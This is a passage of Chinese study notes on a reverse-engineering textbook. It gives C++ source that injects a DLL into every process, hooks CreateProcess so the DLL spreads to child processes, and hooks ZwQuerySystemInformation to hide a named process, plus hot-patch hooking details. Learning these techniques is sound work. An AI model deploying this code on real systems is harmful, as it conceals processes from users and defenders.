逆向工程核心原理读书笔记-API钩取之隐藏进程(二)

上一篇文章我们实现的隐藏进程如果重新打开任务管理器或者被隐藏的进程就没有隐藏的效果了。为了弥补这个问题，我们不仅需要钩取当前运行的所有进程，还要钩取将来运行的所有进程。由于所有的进程都是由父进程使用CreateProcess创建的，所以只要钩取父进程(通常是explorer.exe)的CreateProcess将dll注入所有子进程就可以实现了。要注意下面两个问题。
1.CreateProcess同样有CreateProcessA和CreateProcessW两个版本。
2.为了使得dll文件能注入所有运行进程，首先要把dll复制到%windir%文件夹中，在XP中也就是C:\WINDOWS\system32。

HideProc2.cpp

[cpp] view plain copy

1. #include "windows.h"  
2. #include "stdio.h"  
3. #include "tlhelp32.h"  
4. #include "tchar.h"  
5.   
6. enum {INJECTION_MODE = 0, EJECTION_MODE};  
7.   
8. BOOL SetPrivilege(LPCTSTR lpszPrivilege, BOOL bEnablePrivilege)   
9. {  
10.     TOKEN_PRIVILEGES tp;  
11.     HANDLE hToken;  
12.     LUID luid;  
13.   
14.     if( !OpenProcessToken(GetCurrentProcess(),  
15.                           TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,   
16.                           &hToken) )  
17.     {  
18.         printf("OpenProcessToken error: %u\n", GetLastError());  
19.         return FALSE;  
20.     }  
21.   
22.     if( !LookupPrivilegeValue(NULL,            // lookup privilege on local system  
23.                               lpszPrivilege,   // privilege to lookup   
24.                               &luid) )         // receives LUID of privilege  
25.     {  
26.         printf("LookupPrivilegeValue error: %u\n", GetLastError() );   
27.         return FALSE;   
28.     }  
29.   
30.     tp.PrivilegeCount = 1;  
31.     tp.Privileges[0].Luid = luid;  
32.     if( bEnablePrivilege )  
33.         tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;  
34.     else  
35.         tp.Privileges[0].Attributes = 0;  
36.   
37.     // Enable the privilege or disable all privileges.  
38.     if( !AdjustTokenPrivileges(hToken,   
39.                                FALSE,   
40.                                &tp,   
41.                                sizeof(TOKEN_PRIVILEGES),   
42.                                (PTOKEN_PRIVILEGES) NULL,   
43.                                (PDWORD) NULL) )  
44.     {   
45.         printf("AdjustTokenPrivileges error: %u\n", GetLastError() );   
46.         return FALSE;   
47.     }   
48.   
49.     if( GetLastError() == ERROR_NOT_ALL_ASSIGNED )  
50.     {  
51.         printf("The token does not have the specified privilege. \n");  
52.         return FALSE;  
53.     }   
54.   
55.     return TRUE;  
56. }  
57.   
58. BOOL InjectDll(DWORD dwPID, LPCTSTR szDllPath)  
59. {  
60.     HANDLE                  hProcess, hThread;  
61.     LPVOID                  pRemoteBuf;  
62.     DWORD                   dwBufSize = (DWORD)(_tcslen(szDllPath) + 1) * sizeof(TCHAR);  
63.     LPTHREAD_START_ROUTINE  pThreadProc;  
64.   
65.     if ( !(hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID)) )  
66.     {  
67.         printf("OpenProcess(%d) failed!!!\n", dwPID);  
68.         return FALSE;  
69.     }  
70.   
71.     pRemoteBuf = VirtualAllocEx(hProcess, NULL, dwBufSize,   
72.                                 MEM_COMMIT, PAGE_READWRITE);  
73.   
74.     WriteProcessMemory(hProcess, pRemoteBuf,   
75.                        (LPVOID)szDllPath, dwBufSize, NULL);  
76.   
77.     pThreadProc = (LPTHREAD_START_ROUTINE)  
78.                   GetProcAddress(GetModuleHandle(L"kernel32.dll"),   
79.                                  "LoadLibraryW");  
80.     hThread = CreateRemoteThread(hProcess, NULL, 0,   
81.                                  pThreadProc, pRemoteBuf, 0, NULL);  
82.     WaitForSingleObject(hThread, INFINITE);   
83.   
84.     VirtualFreeEx(hProcess, pRemoteBuf, 0, MEM_RELEASE);  
85.   
86.     CloseHandle(hThread);  
87.     CloseHandle(hProcess);  
88.   
89.     return TRUE;  
90. }  
91.   
92. BOOL EjectDll(DWORD dwPID, LPCTSTR szDllPath)  
93. {  
94.     BOOL                    bMore = FALSE, bFound = FALSE;  
95.     HANDLE                  hSnapshot, hProcess, hThread;  
96.     MODULEENTRY32           me = { sizeof(me) };  
97.     LPTHREAD_START_ROUTINE  pThreadProc;  
98.   
99.     if( INVALID_HANDLE_VALUE ==   
100.         (hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwPID)) )  
101.         return FALSE;  
102.   
103.     bMore = Module32First(hSnapshot, &me);  
104.     for( ; bMore ; bMore = Module32Next(hSnapshot, &me) )  
105.     {  
106.         if( !_tcsicmp(me.szModule, szDllPath) ||   
107.             !_tcsicmp(me.szExePath, szDllPath) )  
108.         {  
109.             bFound = TRUE;  
110.             break;  
111.         }  
112.     }  
113.   
114.     if( !bFound )  
115.     {  
116.         CloseHandle(hSnapshot);  
117.         return FALSE;  
118.     }  
119.   
120.     if( !(hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID)) )  
121.     {  
122.         printf("OpenProcess(%d) failed!!!\n", dwPID);  
123.         CloseHandle(hSnapshot);  
124.         return FALSE;  
125.     }  
126.   
127.     pThreadProc = (LPTHREAD_START_ROUTINE)  
128.                   GetProcAddress(GetModuleHandle(L"kernel32.dll"),   
129.                                  "FreeLibrary");  
130.     hThread = CreateRemoteThread(hProcess, NULL, 0,   
131.                                  pThreadProc, me.modBaseAddr, 0, NULL);  
132.     WaitForSingleObject(hThread, INFINITE);   
133.   
134.     CloseHandle(hThread);  
135.     CloseHandle(hProcess);  
136.     CloseHandle(hSnapshot);  
137.   
138.     return TRUE;  
139. }  
140.   
141. BOOL InjectAllProcess(int nMode, LPCTSTR szDllPath)  
142. {  
143.     DWORD                   dwPID = 0;  
144.     HANDLE                  hSnapShot = INVALID_HANDLE_VALUE;  
145.     PROCESSENTRY32          pe;  
146.   
147.     // Get the snapshot of the system  
148.     pe.dwSize = sizeof( PROCESSENTRY32 );  
149.     hSnapShot = CreateToolhelp32Snapshot( TH32CS_SNAPALL, NULL );  
150.   
151.     // find process  
152.     Process32First(hSnapShot, &pe);  
153.     do  
154.     {  
155.         dwPID = pe.th32ProcessID;  
156.   
157.         
158.         if( dwPID < 100 )  
159.             continue;  
160.   
161.         if( nMode == INJECTION_MODE )  
162.             InjectDll(dwPID, szDllPath);  
163.         else  
164.             EjectDll(dwPID, szDllPath);  
165.     } while( Process32Next(hSnapShot, &pe) );  
166.   
167.     CloseHandle(hSnapShot);  
168.   
169.     return TRUE;  
170. }  
171.   
172. int _tmain(int argc, TCHAR* argv[])  
173. {  
174.     int nMode = INJECTION_MODE;  
175.   
176.     if( argc != 3 )  
177.     {  
178.         printf("\n Usage  : HideProc2.exe <-hide|-show> <dll path>\n\n");  
179.         return 1;  
180.     }  
181.   
182.     // change privilege  
183.     SetPrivilege(SE_DEBUG_NAME, TRUE);  
184.   
185.     // Inject(Eject) Dll to all process  
186.     if( !_tcsicmp(argv[1], L"-show") )  
187.         nMode = EJECTION_MODE;  
188.   
189.     InjectAllProcess(nMode, argv[2]);  
190.   
191.     return 0;  
192. }  

stealth2.cpp

[cpp] view plain copy

1. #include "windows.h"  
2. #include "stdio.h"  
3. #include "tchar.h"  
4.   
5. #define STR_MODULE_NAME                 (L"stealth2.dll")  
6. #define STR_HIDE_PROCESS_NAME           (L"notepad.exe")  
7. #define STATUS_SUCCESS                  (0x00000000L)   
8.   
9. typedef LONG NTSTATUS;  
10.   
11. typedef enum _SYSTEM_INFORMATION_CLASS {  
12.     SystemBasicInformation = 0,  
13.     SystemPerformanceInformation = 2,  
14.     SystemTimeOfDayInformation = 3,  
15.     SystemProcessInformation = 5,  
16.     SystemProcessorPerformanceInformation = 8,  
17.     SystemInterruptInformation = 23,  
18.     SystemExceptionInformation = 33,  
19.     SystemRegistryQuotaInformation = 37,  
20.     SystemLookasideInformation = 45  
21. } SYSTEM_INFORMATION_CLASS;  
22.   
23. typedef struct _SYSTEM_PROCESS_INFORMATION {  
24.     ULONG NextEntryOffset;  
25.     BYTE Reserved1[52];  
26.     PVOID Reserved2[3];  
27.     HANDLE UniqueProcessId;  
28.     PVOID Reserved3;  
29.     ULONG HandleCount;  
30.     BYTE Reserved4[4];  
31.     PVOID Reserved5[11];  
32.     SIZE_T PeakPagefileUsage;  
33.     SIZE_T PrivatePageCount;  
34.     LARGE_INTEGER Reserved6[6];  
35. } SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;  
36.   
37. typedef NTSTATUS (WINAPI *PFZWQUERYSYSTEMINFORMATION)(  
38.     SYSTEM_INFORMATION_CLASS SystemInformationClass,   
39.     PVOID SystemInformation,   
40.     ULONG SystemInformationLength,   
41.     PULONG ReturnLength);  
42.   
43. typedef BOOL (WINAPI *PFCREATEPROCESSA)(  
44.     LPCTSTR lpApplicationName,  
45.     LPTSTR lpCommandLine,  
46.     LPSECURITY_ATTRIBUTES lpProcessAttributes,  
47.     LPSECURITY_ATTRIBUTES lpThreadAttributes,  
48.     BOOL bInheritHandles,  
49.     DWORD dwCreationFlags,  
50.     LPVOID lpEnvironment,  
51.     LPCTSTR lpCurrentDirectory,  
52.     LPSTARTUPINFO lpStartupInfo,  
53.     LPPROCESS_INFORMATION lpProcessInformation  
54. );  
55.   
56. typedef BOOL (WINAPI *PFCREATEPROCESSW)(  
57.     LPCTSTR lpApplicationName,  
58.     LPTSTR lpCommandLine,  
59.     LPSECURITY_ATTRIBUTES lpProcessAttributes,  
60.     LPSECURITY_ATTRIBUTES lpThreadAttributes,  
61.     BOOL bInheritHandles,  
62.     DWORD dwCreationFlags,  
63.     LPVOID lpEnvironment,  
64.     LPCTSTR lpCurrentDirectory,  
65.     LPSTARTUPINFO lpStartupInfo,  
66.     LPPROCESS_INFORMATION lpProcessInformation  
67. );  
68.   
69. BYTE g_pOrgCPA[5] = {0,};  
70. BYTE g_pOrgCPW[5] = {0,};  
71. BYTE g_pOrgZwQSI[5] = {0,};  
72.   
73. BOOL hook_by_code(LPCSTR szDllName, LPCSTR szFuncName, PROC pfnNew, PBYTE pOrgBytes)  
74. {  
75.     FARPROC pFunc;  
76.     DWORD dwOldProtect, dwAddress;  
77.     BYTE pBuf[5] = {0xE9, 0, };  
78.     PBYTE pByte;  
79.   
80.     pFunc = (FARPROC)GetProcAddress(GetModuleHandleA(szDllName), szFuncName);  
81.     pByte = (PBYTE)pFunc;  
82.     if( pByte[0] == 0xE9 )  
83.         return FALSE;  
84.   
85.     VirtualProtect((LPVOID)pFunc, 5, PAGE_EXECUTE_READWRITE, &dwOldProtect);  
86.   
87.     memcpy(pOrgBytes, pFunc, 5);  
88.   
89.     dwAddress = (DWORD)pfnNew - (DWORD)pFunc - 5;  
90.     memcpy(&pBuf[1], &dwAddress, 4);  
91.   
92.     memcpy(pFunc, pBuf, 5);  
93.   
94.     VirtualProtect((LPVOID)pFunc, 5, dwOldProtect, &dwOldProtect);  
95.   
96.     return TRUE;  
97. }  
98.   
99. BOOL unhook_by_code(LPCSTR szDllName, LPCSTR szFuncName, PBYTE pOrgBytes)  
100. {  
101.     FARPROC pFunc;  
102.     DWORD dwOldProtect;  
103.     PBYTE pByte;  
104.   
105.     pFunc = (FARPROC)GetProcAddress(GetModuleHandleA(szDllName), szFuncName);  
106.     pByte = (PBYTE)pFunc;  
107.     if( pByte[0] != 0xE9 )  
108.         return FALSE;  
109.   
110.     VirtualProtect((LPVOID)pFunc, 5, PAGE_EXECUTE_READWRITE, &dwOldProtect);  
111.   
112.     memcpy(pFunc, pOrgBytes, 5);  
113.   
114.     VirtualProtect((LPVOID)pFunc, 5, dwOldProtect, &dwOldProtect);  
115.   
116.     return TRUE;  
117. }  
118.   
119. BOOL SetPrivilege(LPCTSTR lpszPrivilege, BOOL bEnablePrivilege)   
120. {  
121.     TOKEN_PRIVILEGES tp;  
122.     HANDLE hToken;  
123.     LUID luid;  
124.   
125.     if( !OpenProcessToken(GetCurrentProcess(),  
126.                           TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,   
127.                           &hToken) )  
128.     {  
129.         printf("OpenProcessToken error: %u\n", GetLastError());  
130.         return FALSE;  
131.     }  
132.   
133.     if( !LookupPrivilegeValue(NULL,             // lookup privilege on local system  
134.                               lpszPrivilege,    // privilege to lookup   
135.                               &luid) )          // receives LUID of privilege  
136.     {  
137.         printf("LookupPrivilegeValue error: %u\n", GetLastError() );   
138.         return FALSE;   
139.     }  
140.   
141.     tp.PrivilegeCount = 1;  
142.     tp.Privileges[0].Luid = luid;  
143.     if( bEnablePrivilege )  
144.         tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;  
145.     else  
146.         tp.Privileges[0].Attributes = 0;  
147.   
148.     // Enable the privilege or disable all privileges.  
149.     if( !AdjustTokenPrivileges(hToken,   
150.                                FALSE,   
151.                                &tp,   
152.                                sizeof(TOKEN_PRIVILEGES),   
153.                                (PTOKEN_PRIVILEGES) NULL,   
154.                                (PDWORD) NULL) )  
155.     {   
156.         printf("AdjustTokenPrivileges error: %u\n", GetLastError() );   
157.         return FALSE;   
158.     }   
159.   
160.     if( GetLastError() == ERROR_NOT_ALL_ASSIGNED )  
161.     {  
162.         printf("The token does not have the specified privilege. \n");  
163.         return FALSE;  
164.     }   
165.   
166.     return TRUE;  
167. }  
168.   
169. BOOL InjectDll2(HANDLE hProcess, LPCTSTR szDllName)  
170. {  
171.     HANDLE hThread;  
172.     LPVOID pRemoteBuf;  
173.     DWORD dwBufSize = (DWORD)(_tcslen(szDllName) + 1) * sizeof(TCHAR);  
174.     FARPROC pThreadProc;  
175.   
176.     pRemoteBuf = VirtualAllocEx(hProcess, NULL, dwBufSize,   
177.                                 MEM_COMMIT, PAGE_READWRITE);  
178.     if( pRemoteBuf == NULL )  
179.         return FALSE;  
180.   
181.     WriteProcessMemory(hProcess, pRemoteBuf, (LPVOID)szDllName,   
182.                        dwBufSize, NULL);  
183.   
184.     pThreadProc = GetProcAddress(GetModuleHandleA("kernel32.dll"),   
185.                                  "LoadLibraryW");  
186.     hThread = CreateRemoteThread(hProcess, NULL, 0,   
187.                                  (LPTHREAD_START_ROUTINE)pThreadProc,   
188.                                  pRemoteBuf, 0, NULL);  
189.     WaitForSingleObject(hThread, INFINITE);   
190.   
191.     VirtualFreeEx(hProcess, pRemoteBuf, 0, MEM_RELEASE);  
192.   
193.     CloseHandle(hThread);  
194.   
195.     return TRUE;  
196. }  
197.   
198. NTSTATUS WINAPI NewZwQuerySystemInformation(  
199.     SYSTEM_INFORMATION_CLASS SystemInformationClass,   
200.     PVOID SystemInformation,   
201.     ULONG SystemInformationLength,   
202.     PULONG ReturnLength)  
203. {  
204.     NTSTATUS status;  
205.     FARPROC pFunc;  
206.     PSYSTEM_PROCESS_INFORMATION pCur, pPrev;  
207.     char szProcName[MAX_PATH] = {0,};  
208.   
209.     unhook_by_code("ntdll.dll", "ZwQuerySystemInformation", g_pOrgZwQSI);  
210.   
211.     pFunc = GetProcAddress(GetModuleHandleA("ntdll.dll"),   
212.                            "ZwQuerySystemInformation");  
213.     status = ((PFZWQUERYSYSTEMINFORMATION)pFunc)  
214.              (SystemInformationClass, SystemInformation,   
215.               SystemInformationLength, ReturnLength);  
216.   
217.     if( status != STATUS_SUCCESS )  
218.         goto __NTQUERYSYSTEMINFORMATION_END;  
219.   
220.     if( SystemInformationClass == SystemProcessInformation )  
221.     {  
222.         pCur = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;  
223.   
224.         while(TRUE)  
225.         {  
226.             if(pCur->Reserved2[1] != NULL)  
227.             {  
228.                 if(!_tcsicmp((PWSTR)pCur->Reserved2[1], STR_HIDE_PROCESS_NAME))  
229.                 {  
230.                     if(pCur->NextEntryOffset == 0)  
231.                         pPrev->NextEntryOffset = 0;  
232.                     else  
233.                         pPrev->NextEntryOffset += pCur->NextEntryOffset;  
234.                 }  
235.                 else          
236.                     pPrev = pCur;     
237.             }  
238.   
239.             if(pCur->NextEntryOffset == 0)  
240.                 break;  
241.   
242.             pCur = (PSYSTEM_PROCESS_INFORMATION)((ULONG)pCur + pCur->NextEntryOffset);  
243.         }  
244.     }  
245.   
246. __NTQUERYSYSTEMINFORMATION_END:  
247.   
248.     hook_by_code("ntdll.dll", "ZwQuerySystemInformation",   
249.                  (PROC)NewZwQuerySystemInformation, g_pOrgZwQSI);  
250.   
251.     return status;  
252. }  
253.   
254. BOOL WINAPI NewCreateProcessA(  
255.     LPCTSTR lpApplicationName,  
256.     LPTSTR lpCommandLine,  
257.     LPSECURITY_ATTRIBUTES lpProcessAttributes,  
258.     LPSECURITY_ATTRIBUTES lpThreadAttributes,  
259.     BOOL bInheritHandles,  
260.     DWORD dwCreationFlags,  
261.     LPVOID lpEnvironment,  
262.     LPCTSTR lpCurrentDirectory,  
263.     LPSTARTUPINFO lpStartupInfo,  
264.     LPPROCESS_INFORMATION lpProcessInformation  
265. )  
266. {  
267.     BOOL bRet;  
268.     FARPROC pFunc;  
269.   
270.    
271.     unhook_by_code("kernel32.dll", "CreateProcessA", g_pOrgCPA);  
272.   
273.      
274.     pFunc = GetProcAddress(GetModuleHandleA("kernel32.dll"), "CreateProcessA");  
275.     bRet = ((PFCREATEPROCESSA)pFunc)(lpApplicationName,  
276.                                      lpCommandLine,  
277.                                      lpProcessAttributes,  
278.                                      lpThreadAttributes,  
279.                                      bInheritHandles,  
280.                                      dwCreationFlags,  
281.                                      lpEnvironment,  
282.                                      lpCurrentDirectory,  
283.                                      lpStartupInfo,  
284.                                      lpProcessInformation);  
285.   
286.       
287.     if( bRet )  
288.         InjectDll2(lpProcessInformation->hProcess, STR_MODULE_NAME);  
289.   
290.     
291.     hook_by_code("kernel32.dll", "CreateProcessA",   
292.                  (PROC)NewCreateProcessA, g_pOrgCPA);  
293.   
294.     return bRet;  
295. }  
296.   
297. BOOL WINAPI NewCreateProcessW(  
298.     LPCTSTR lpApplicationName,  
299.     LPTSTR lpCommandLine,  
300.     LPSECURITY_ATTRIBUTES lpProcessAttributes,  
301.     LPSECURITY_ATTRIBUTES lpThreadAttributes,  
302.     BOOL bInheritHandles,  
303.     DWORD dwCreationFlags,  
304.     LPVOID lpEnvironment,  
305.     LPCTSTR lpCurrentDirectory,  
306.     LPSTARTUPINFO lpStartupInfo,  
307.     LPPROCESS_INFORMATION lpProcessInformation  
308. )  
309. {  
310.     BOOL bRet;  
311.     FARPROC pFunc;  
312.   
313.     
314.     unhook_by_code("kernel32.dll", "CreateProcessW", g_pOrgCPW);  
315.   
316.     
317.     pFunc = GetProcAddress(GetModuleHandleA("kernel32.dll"), "CreateProcessW");  
318.     bRet = ((PFCREATEPROCESSW)pFunc)(lpApplicationName,  
319.                                      lpCommandLine,  
320.                                      lpProcessAttributes,  
321.                                      lpThreadAttributes,  
322.                                      bInheritHandles,  
323.                                      dwCreationFlags,  
324.                                      lpEnvironment,  
325.                                      lpCurrentDirectory,  
326.                                      lpStartupInfo,  
327.                                      lpProcessInformation);  
328.   
329.     
330.     if( bRet )  
331.         InjectDll2(lpProcessInformation->hProcess, STR_MODULE_NAME);  
332.   
333.    
334.     hook_by_code("kernel32.dll", "CreateProcessW",   
335.                 (PROC)NewCreateProcessW, g_pOrgCPW);  
336.   
337.     return bRet;  
338. }  
339.   
340. BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)  
341. {  
342.     char            szCurProc[MAX_PATH] = {0,};  
343.     char            *p = NULL;  
344.   
345.      
346.     GetModuleFileNameA(NULL, szCurProc, MAX_PATH);  
347.     p = strrchr(szCurProc, '\\');  
348.     if( (p != NULL) && !_stricmp(p+1, "HideProc2.exe") )  
349.         return TRUE;  
350.   
351.     
352.     SetPrivilege(SE_DEBUG_NAME, TRUE);  
353.   
354.     switch( fdwReason )  
355.     {  
356.         case DLL_PROCESS_ATTACH :   
357.         
358.             hook_by_code("kernel32.dll", "CreateProcessA",   
359.                          (PROC)NewCreateProcessA, g_pOrgCPA);  
360.             hook_by_code("kernel32.dll", "CreateProcessW",   
361.                          (PROC)NewCreateProcessW, g_pOrgCPW);  
362.             hook_by_code("ntdll.dll", "ZwQuerySystemInformation",   
363.                          (PROC)NewZwQuerySystemInformation, g_pOrgZwQSI);  
364.             break;  
365.   
366.         case DLL_PROCESS_DETACH :  
367.          
368.             unhook_by_code("kernel32.dll", "CreateProcessA",   
369.                            g_pOrgCPA);  
370.             unhook_by_code("kernel32.dll", "CreateProcessW",   
371.                            g_pOrgCPW);  
372.             unhook_by_code("ntdll.dll", "ZwQuerySystemInformation",   
373.                            g_pOrgZwQSI);  
374.             break;  
375.     }  
376.   
377.     return TRUE;  
378. }  

但是每当程序内部调用CreateProcess时NewCreateProcess都会反复执行脱钩/挂钩操作，不仅会造成整体性能低下，在多线程环境下还会产生运行时错误。使用Hot Patch技术修改7个字节代码，比修改5个字节代码更加稳定。先来看看常用API代码的起始部分，以CreateProcessA为例。

API代码以2个字节的MOV EDI,EDI指令开始，上方还有5个nop指令，一共7个字节没有意义的指令，这就是为了方便打热补丁用的。将API起始代码前的5个字节修改为FAR JMP指令，然后将API起始代码处的2个字节修改为SHORT JMP指令跳转到前面FAR JMP处。
我们来分析一下源代码，看看是怎么实现的。
因为HideProc2.cpp不需要改动，所以主要讲解stealth3.cpp。首先分析hook_by_hotpatch函数。

[cpp] view plain copy

1. BOOL hook_by_hotpatch(LPCSTR szDllName, LPCSTR szFuncName, PROC pfnNew)  
2. {  
3.     FARPROC pFunc;  
4.     DWORD dwOldProtect, dwAddress;  
5.     BYTE pBuf[5] = { 0xE9, 0, };  
6.     BYTE pBuf2[2] = { 0xEB, 0xF9 };  
7.     PBYTE pByte;  
8.   
9.     pFunc = (FARPROC)GetProcAddress(GetModuleHandleA(szDllName), szFuncName);  
10.     pByte = (PBYTE)pFunc;  
11.     if( pByte[0] == 0xEB )  
12.         return FALSE;  
13.   
14.     VirtualProtect((LPVOID)((DWORD)pFunc - 5), 7, PAGE_EXECUTE_READWRITE, &dwOldProtect);  
15.   
16.   
17.     dwAddress = (DWORD)pfnNew - (DWORD)pFunc;  
18.     memcpy(&pBuf[1], &dwAddress, 4);  
19.     memcpy((LPVOID)((DWORD)pFunc - 5), pBuf, 5);  
20.       
21.   
22.     memcpy(pFunc, pBuf2, 2);  
23.   
24.     VirtualProtect((LPVOID)((DWORD)pFunc - 5), 7, dwOldProtect, &dwOldProtect);  
25.   
26.     return TRUE;  
27. }  

计算一下JMP XXXXXXXX和JMP YY的地址。
XXXXXXXX
=要跳转的地址-当前指令地址-当前指令长度(5)
=(DWORD)pfnNew-((DWORD)pFunc-5)-5
=(DWORD)pfnNew-(DWORD)pFunc
YY
=要跳转的地址-当前指令地址-当前指令长度(2)
=(pFunc-5)-pFunc-2=-7=0xF9
YY的值是固定的，硬编码到源代码里面就可以了。
接下来是unhook_by_hotpatch函数，它用来恢复修改后的指令。这些指令同样是固定的，所以还是硬编码到源代码里面。

[cpp] view plain copy

1. BOOL unhook_by_hotpatch(LPCSTR szDllName, LPCSTR szFuncName)  
2. {  
3.     FARPROC pFunc;  
4.     DWORD dwOldProtect;  
5.     PBYTE pByte;  
6.     BYTE pBuf[5] = { 0x90, 0x90, 0x90, 0x90, 0x90 };  
7.     BYTE pBuf2[2] = { 0x8B, 0xFF };  
8.   
9.   
10.     pFunc = (FARPROC)GetProcAddress(GetModuleHandleA(szDllName), szFuncName);  
11.     pByte = (PBYTE)pFunc;  
12.     if( pByte[0] != 0xEB )  
13.         return FALSE;  
14.   
15.     VirtualProtect((LPVOID)pFunc, 5, PAGE_EXECUTE_READWRITE, &dwOldProtect);  
16.   
17.    
18.     memcpy((LPVOID)((DWORD)pFunc - 5), pBuf, 5);  
19.       
20.     
21.     memcpy(pFunc, pBuf2, 2);  
22.   
23.     VirtualProtect((LPVOID)pFunc, 5, dwOldProtect, &dwOldProtect);  
24.   
25.     return TRUE;  
26. }  

最后是NewCreateProcessA函数。和前面不同的是，NewCreateProcessA中不再需要调用unhook_by_code和hook_by_code函数，而是添加了计算pFunc的语句，用来跳过API起始位置处的JMP YY指令，使得能够达到与调用原API一样的效果。

[cpp] view plain copy

1. BOOL WINAPI NewCreateProcessA(  
2.     LPCTSTR lpApplicationName,  
3.     LPTSTR lpCommandLine,  
4.     LPSECURITY_ATTRIBUTES lpProcessAttributes,  
5.     LPSECURITY_ATTRIBUTES lpThreadAttributes,  
6.     BOOL bInheritHandles,  
7.     DWORD dwCreationFlags,  
8.     LPVOID lpEnvironment,  
9.     LPCTSTR lpCurrentDirectory,  
10.     LPSTARTUPINFO lpStartupInfo,  
11.     LPPROCESS_INFORMATION lpProcessInformation  
12. )  
13. {  
14.     BOOL bRet;  
15.     FARPROC pFunc;  
16.   
17.   
18.     pFunc = GetProcAddress(GetModuleHandleA("kernel32.dll"), "CreateProcessA");  
19.     pFunc = (FARPROC)((DWORD)pFunc + 2);  
20.     bRet = ((PFCREATEPROCESSA)pFunc)(lpApplicationName,  
21.                                      lpCommandLine,  
22.                                      lpProcessAttributes,  
23.                                      lpThreadAttributes,  
24.                                      bInheritHandles,  
25.                                      dwCreationFlags,  
26.                                      lpEnvironment,  
27.                                      lpCurrentDirectory,  
28.                                      lpStartupInfo,  
29.                                      lpProcessInformation);  
30.   
31.    
32.     if( bRet )  
33.         InjectDll2(lpProcessInformation->hProcess, STR_MODULE_NAME);  
34.   
35.     return bRet;  
36. }  

完整的代码如下。

[cpp] view plain copy

1. #include "windows.h"  
2. #include "stdio.h"  
3. #include "tchar.h"  
4.   
5. #define STR_MODULE_NAME                 (L"stealth3.dll")  
6. #define STR_HIDE_PROCESS_NAME           (L"notepad.exe")  
7. #define STATUS_SUCCESS                  (0x00000000L)   
8.   
9. typedef LONG NTSTATUS;  
10.   
11. typedef enum _SYSTEM_INFORMATION_CLASS {  
12.     SystemBasicInformation = 0,  
13.     SystemPerformanceInformation = 2,  
14.     SystemTimeOfDayInformation = 3,  
15.     SystemProcessInformation = 5,  
16.     SystemProcessorPerformanceInformation = 8,  
17.     SystemInterruptInformation = 23,  
18.     SystemExceptionInformation = 33,  
19.     SystemRegistryQuotaInformation = 37,  
20.     SystemLookasideInformation = 45  
21. } SYSTEM_INFORMATION_CLASS;  
22.   
23. typedef struct _SYSTEM_PROCESS_INFORMATION {  
24.     ULONG NextEntryOffset;  
25.     BYTE Reserved1[52];  
26.     PVOID Reserved2[3];  
27.     HANDLE UniqueProcessId;  
28.     PVOID Reserved3;  
29.     ULONG HandleCount;  
30.     BYTE Reserved4[4];  
31.     PVOID Reserved5[11];  
32.     SIZE_T PeakPagefileUsage;  
33.     SIZE_T PrivatePageCount;  
34.     LARGE_INTEGER Reserved6[6];  
35. } SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;  
36.   
37. typedef NTSTATUS (WINAPI *PFZWQUERYSYSTEMINFORMATION)(  
38.     SYSTEM_INFORMATION_CLASS SystemInformationClass,   
39.     PVOID SystemInformation,   
40.     ULONG SystemInformationLength,   
41.     PULONG ReturnLength);  
42.   
43. typedef BOOL (WINAPI *PFCREATEPROCESSA)(  
44.     LPCTSTR lpApplicationName,  
45.     LPTSTR lpCommandLine,  
46.     LPSECURITY_ATTRIBUTES lpProcessAttributes,  
47.     LPSECURITY_ATTRIBUTES lpThreadAttributes,  
48.     BOOL bInheritHandles,  
49.     DWORD dwCreationFlags,  
50.     LPVOID lpEnvironment,  
51.     LPCTSTR lpCurrentDirectory,  
52.     LPSTARTUPINFO lpStartupInfo,  
53.     LPPROCESS_INFORMATION lpProcessInformation  
54. );  
55.   
56. typedef BOOL (WINAPI *PFCREATEPROCESSW)(  
57.     LPCTSTR lpApplicationName,  
58.     LPTSTR lpCommandLine,  
59.     LPSECURITY_ATTRIBUTES lpProcessAttributes,  
60.     LPSECURITY_ATTRIBUTES lpThreadAttributes,  
61.     BOOL bInheritHandles,  
62.     DWORD dwCreationFlags,  
63.     LPVOID lpEnvironment,  
64.     LPCTSTR lpCurrentDirectory,  
65.     LPSTARTUPINFO lpStartupInfo,  
66.     LPPROCESS_INFORMATION lpProcessInformation  
67. );  
68.   
69. BYTE g_pOrgZwQSI[5] = {0,};  
70.   
71. BOOL hook_by_code(LPCSTR szDllName, LPCSTR szFuncName, PROC pfnNew, PBYTE pOrgBytes)  
72. {  
73.     FARPROC pFunc;  
74.     DWORD dwOldProtect, dwAddress;  
75.     BYTE pBuf[5] = {0xE9, 0, };  
76.     PBYTE pByte;  
77.   
78.     pFunc = (FARPROC)GetProcAddress(GetModuleHandleA(szDllName), szFuncName);  
79.     pByte = (PBYTE)pFunc;  
80.     if( pByte[0] == 0xE9 )  
81.         return FALSE;  
82.   
83.     VirtualProtect((LPVOID)pFunc, 5, PAGE_EXECUTE_READWRITE, &dwOldProtect);  
84.   
85.     memcpy(pOrgBytes, pFunc, 5);  
86.   
87.     dwAddress = (DWORD)pfnNew - (DWORD)pFunc - 5;  
88.     memcpy(&pBuf[1], &dwAddress, 4);  
89.   
90.     memcpy(pFunc, pBuf, 5);  
91.   
92.     VirtualProtect((LPVOID)pFunc, 5, dwOldProtect, &dwOldProtect);  
93.   
94.     return TRUE;  
95. }  
96.   
97. BOOL hook_by_hotpatch(LPCSTR szDllName, LPCSTR szFuncName, PROC pfnNew)  
98. {  
99.     FARPROC pFunc;  
100.     DWORD dwOldProtect, dwAddress;  
101.     BYTE pBuf[5] = { 0xE9, 0, };  
102.     BYTE pBuf2[2] = { 0xEB, 0xF9 };  
103.     PBYTE pByte;  
104.   
105.     pFunc = (FARPROC)GetProcAddress(GetModuleHandleA(szDllName), szFuncName);  
106.     pByte = (PBYTE)pFunc;  
107.     if( pByte[0] == 0xEB )  
108.         return FALSE;  
109.   
110.     VirtualProtect((LPVOID)((DWORD)pFunc - 5), 7, PAGE_EXECUTE_READWRITE, &dwOldProtect);  
111.   
112.   
